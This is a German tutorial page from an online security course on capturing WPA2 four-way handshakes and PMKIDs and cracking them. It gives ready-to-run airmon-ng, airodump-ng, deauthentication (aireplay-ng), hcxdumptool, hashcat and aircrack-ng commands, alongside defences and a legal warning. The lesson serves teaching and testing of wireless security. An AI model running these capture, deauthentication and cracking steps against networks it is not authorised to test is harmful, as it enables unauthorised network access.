WPA2-Handshake erfassen und knacken
Erfassen Sie mit aircrack-ng einen 4-Wege-Handshake und versuchen Sie mit Hashcat Wörterbuchangriffe durchzuführen.
WPA2-Handshake erfassen und knacken ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 2 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Der 4-Wege-Handshake
Wenn ein Client eine WPA2-Verbindung herstellt, leitet der 4-Wege-Handshake den Pairwise Transient Key (PTK) aus dem PMK (abgeleitet aus dem PSK) und zufälligen Nonces ab. Wird dieser Handshake mitgeschnitten, ermöglicht dies das Offline-Knacken des Passworts.
Monitor-Modus einrichten
Der Monitor-Modus ermöglicht es der WLAN-Karte, alle Frames unabhängig von ihrem Ziel zu erfassen – eine Voraussetzung für das passive Mitschneiden von Handshakes. Er funktioniert nur mit Karten, die den Monitor-Modus unterstützen.
# Check wireless interface
iwconfig
# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon
# Kill interfering processes first:
sudo airmon-ng check killPassives Mitschneiden des Handshakes
Airodump-ng erfasst Frames passiv. Warten Sie, bis sich ein Client auf natürliche Weise verbindet, oder erzwingen Sie über eine Deauthentifizierung eine erneute Verbindung. Der aufgezeichnete Handshake wird oben rechts in der Airodump-Ausgabe angezeigt.
# Scan for networks
sudo airodump-ng wlan0mon
# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w handshake_capture \
wlan0mon
# Top right shows: WPA handshake: AA:BB:...Deauthentifizierungsangriff
Das Senden gefälschter Deauth-Frames zwingt verbundene Clients zur Trennung und erneuten Verbindung, wodurch ein neuer Handshake mitgeschnitten werden kann. Dieser Vorgang ist auffällig und erkennbar und setzt voraus, dass sich der Client in Reichweite befindet.
# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
-a AA:BB:CC:DD:EE:FF \
-c CC:DD:EE:FF:00:11 \
wlan0mon
# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)PMKID-Angriff: Kein Client erforderlich
Der PMKID-Angriff (hcxdumptool) erfasst die PMKID aus Beacon- und Probe-Frames, ohne dass ein verbundener Client erforderlich ist. Die PMKID lässt sich schneller erfassen und ebenso gut knacken wie ein vollständiger Handshake.
# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
-o pmkid.pcapng
# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txtHandshake mit Hashcat knacken
Konvertieren Sie die Mitschnittdatei und führen Sie den Angriff mit dem Hashcat-Modus 22000 (vereinheitlichtes WPA2-Format) oder dem Modus 2500 (Legacy-Format) durch. Verwenden Sie für die besten Ergebnisse rockyou.txt zusammen mit Regelwerken.
# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap
# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt
# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?dMit Aircrack-ng knacken
Aircrack-ng führt das WPA2-Knacken direkt aus der Mitschnittdatei CPU-basiert durch. Es ist langsamer als das GPU-basierte Knacken mit Hashcat, erfordert dafür aber keine Formatkonvertierung.
# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap
# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.capStrategie für Wortlisten
Der Erfolg beim Knacken von WPA2-Passwörtern hängt vollständig von der Qualität der Wortliste ab. Verwenden Sie rockyou.txt als Grundlage, Hashcat-Regelwerke für Varianten, unternehmensspezifische Wortlisten (Name+Jahr+Symbol) und gezielte Listen aus OSINT-Quellen.
Die Realität der Knackzeit
Ein zufälliges WPA2-Passwort mit mindestens 20 Zeichen ist praktisch nicht zu knacken. Das Knacken ist nur bei kurzen oder auf Wörterbüchern basierenden Passwörtern realistisch. Deshalb sind Passwortlänge und Zufälligkeit wichtiger als Regeln zur Komplexität.
Schutzmaßnahmen
Verwenden Sie WPA3-SAE (gegen Offline-Wörterbuchangriffe geschützt), WPA2 mit einer zufälligen Passphrase aus mindestens 20 Zeichen oder WPA2-Enterprise mit EAP-TLS (Zertifikate statt Passwörter).
Rechtlicher Hinweis
Das Mitschneiden von WPA2-Handshakes in Netzwerken, die Ihnen nicht gehören, ist illegal. Alle hier beschriebenen Techniken dürfen ausschließlich in Ihren eigenen Testnetzwerken oder autorisierten Laborumgebungen eingesetzt werden (z. B. im Heimlabor oder mit einem eigens dafür eingerichteten Test-AP).
Kurztest
Welche Verbesserung bietet der PMKID-Angriff gegenüber dem standardmäßigen Mitschneiden eines Handshakes?
Zusammenfassung: WPA2-Knacken
Das Mitschneiden eines WPA2-Handshakes oder einer PMKID verwandelt das Knacken eines WLANs in einen Offline-Wörterbuchangriff. Der Erfolg hängt vollständig von der Passwortstärke ab: Kurze und auf Wörterbüchern basierende Passwörter werden schnell geknackt, lange zufällige Passwörter sind praktisch nicht zu knacken. Schützen Sie sich mit WPA3-SAE, starken Passphrasen und WPA2-Enterprise für Unternehmensnetzwerke.
Lerne Cyber Security Academy mit einem KI-Tutor — kostenlos
Schreibe und führe echten Code in deinem Browser aus, bekomme sofortige Hilfe von einem 24/7 KI-Tutor und setze dein Lernen im Web oder in der App fort.
- Kurse
- 76
- Lektionen
- 303
Häufig gestellte Fragen
Ist die Lektion „WPA2-Handshake erfassen und knacken“ kostenlos?
Ja — der vollständige Text von „WPA2-Handshake erfassen und knacken“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.
Was lerne ich in „WPA2-Handshake erfassen und knacken“?
Erfassen Sie mit aircrack-ng einen 4-Wege-Handshake und versuchen Sie mit Hashcat Wörterbuchangriffe durchzuführen. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.
Brauche ich Erfahrung, um Cyber Security Academy zu starten?
Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 2 von 4.
Wie lange dauert die Lektion „WPA2-Handshake erfassen und knacken“?
Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.
Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?
Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.
Alle Lektionen in diesem Kurs
- 802.11-Sicherheitsprotokolle: WEP, WPA2 und WPA3
- WPA2-Handshake erfassen und knacken
- Evil-Twin- und Captive-Portal-Angriffe
- Unternehmens-WLAN: EAP und RADIUS